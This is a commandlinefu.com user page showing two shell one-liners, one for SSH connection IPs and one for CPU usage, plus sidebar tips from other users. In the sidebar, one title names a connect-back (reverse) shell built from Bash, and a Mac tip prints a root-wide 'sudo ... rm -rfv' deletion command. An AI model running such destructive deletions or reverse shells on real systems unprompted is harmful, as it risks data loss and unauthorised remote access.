Commands by toxick (2)


  • 1
    netstat -tn | awk '($4 ~ /:22\s*/) && ($6 ~ /^EST/) {print substr($5, 0, index($5,":"))}'
    toxick · 2012-10-03 04:47:54 0
  • Using the output of 'ps' to determine CPU usage is misleading, as the CPU column in 'ps' shows CPU usage per process over the entire lifetime of the process. In order to get *current* CPU usage (without scraping a top screen) you need to pull some numbers from /proc/stat. Here, we take two readings, once second apart, determine how much IDLE time was spent across all CPUs, divide by the number of CPUs, and then subtract from 100 to get non-idle time. Show Sample Output


    0
    NUMCPUS=`grep ^proc /proc/cpuinfo | wc -l`; FIRST=`cat /proc/stat | awk '/^cpu / {print $5}'`; sleep 1; SECOND=`cat /proc/stat | awk '/^cpu / {print $5}'`; USED=`echo 2 k 100 $SECOND $FIRST - $NUMCPUS / - p | dc`; echo ${USED}% CPU Usage
    toxick · 2012-10-02 03:57:51 1

What's this?

commandlinefu.com is the place to record those command-line gems that you return to again and again. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.

Share Your Commands


Check These Out

Mac OS X: remove extra languages to save over 3 GB of space.
This will get the job done in the most efficient way - spawning only one `rm` process. "On-the-fly" find data is displayed through `tee` and you should have plenty of time to ctrl-c if needed before it's too late. You may need to re-run this after major Software Updates. To leave more languages in, add more ``-and \! -iname "lang*"'' statements: $ sudo find / -iname "*.lproj" -and \! -iname "en*" -and \! -iname "spanish*" -print0 | tee /dev/stderr | sudo xargs -0 rm -rfv **Edit: note the 2nd sudo near the end of the pipeline - this is necessary.

cd to (or operate on) a file across parallel directories
This is useful for quickly jumping around branches in a file system, or operating on a parellel file. This is tested in bash. cd to (substitute in PWD, a for b) where PWD is the bash environmental variable for the "working directory"

Find files with at least one exec bit set

Connect-back shell using Bash built-ins

Convert tab separate file (TSV) to JSON with jq
With this command you can convert a tab separate file (TSV) into a JSON file with jq. For example, this input.tsv i-0b9adca882e5e6326 172.16.0.188 i-088dd69e5c3624888 172.16.0.102 i-0e70eac180537d4aa 172.16.0.85 will produce the showed output.

Get AWS temporary credentials ready to export based on a MFA virtual appliance
You might want to secure your AWS operations requiring to use a MFA token. But then to use API or tools, you need to pass credentials generated with a MFA token. This commands asks you for the MFA code and retrieves these credentials using AWS Cli. To print the exports, you can use: `awk '{ print "export AWS_ACCESS_KEY_ID=\"" $1 "\"\n" "export AWS_SECRET_ACCESS_KEY=\"" $2 "\"\n" "export AWS_SESSION_TOKEN=\"" $3 "\"" }'` You must adapt the command line to include: * $MFA_IDis ARN of the virtual MFA or serial number of the physical one * TTL for the credentials

See how many more processes are allowed, awesome!
There is a limit to how many processes you can run at the same time for each user, especially with web hosts. If the maximum # of processes for your user is 200, then the following sets OPTIMUM_P to 100. $ OPTIMUM_P=$(( (`ulimit -u` - `find /proc -maxdepth 1 \( -user $USER -o -group $GROUPNAME \) -type d|wc -l`) / 2 )) This is very useful in scripts because this is such a fast low-resource-intensive (compared to ps, who, lsof, etc) way to determine how many processes are currently running for whichever user. The number of currently running processes is subtracted from the high limit setup for the account (see limits.conf, pam, initscript). An easy to understand example- this searches the current directory for shell scripts, and runs up to 100 'file' commands at the same time, greatly speeding up the command. $ find . -type f | xargs -P $OPTIMUM_P -iFNAME file FNAME | sed -n '/shell script text/p' I am using it in my http://www.askapache.com/linux-unix/bash_profile-functions-advanced-shell.html especially for the xargs command. Xargs has a -P option that lets you specify how many processes to run at the same time. For instance if you have 1000 urls in a text file and wanted to download all of them fast with curl, you could download 100 at a time (check ps output on a separate [pt]ty for proof) like this: $ cat url-list.txt | xargs -I '{}' -P $OPTIMUM_P curl -O '{}' I like to do things as fast as possible on my servers. I have several types of servers and hosting environments, some with very restrictive jail shells with 20processes limit, some with 200, some with 8000, so for the jailed shells my xargs -P10 would kill my shell or dump core. Using the above I can set the -P value dynamically, so xargs always works, like this. $ cat url-list.txt | xargs -I '{}' -P $OPTIMUM_P curl -O '{}' If you were building a process-killer (very common for cheap hosting) this would also be handy. Note that if you are only allowed 20 or so processes, you should just use -P1 with xargs.

Convert JSON to YAML
Requires installing json2yaml via npm: npm install -g json2yaml (can also pipe from stdin) Ref: https://www.npmjs.com/package/json2yaml

Create a mirror of a local folder, on a remote server
Create a exact mirror of the local folder "/root/files", on remote server 'remote_server' using SSH command (listening on port 22) (all files & folders on destination server/folder will be deleted)

Convert JSON to YAML
Requires installing json2yaml via npm: npm install -g json2yaml (can also pipe from stdin) Ref: https://www.npmjs.com/package/json2yaml


Stay in the loop…

Follow the Tweets.

Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes - that way only the great commands get tweeted.

» http://twitter.com/commandlinefu
» http://twitter.com/commandlinefu3
» http://twitter.com/commandlinefu10

Subscribe to the feeds.

Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams as well as for virtually every other subset (users, tags, functions,…):

Subscribe to the feed for: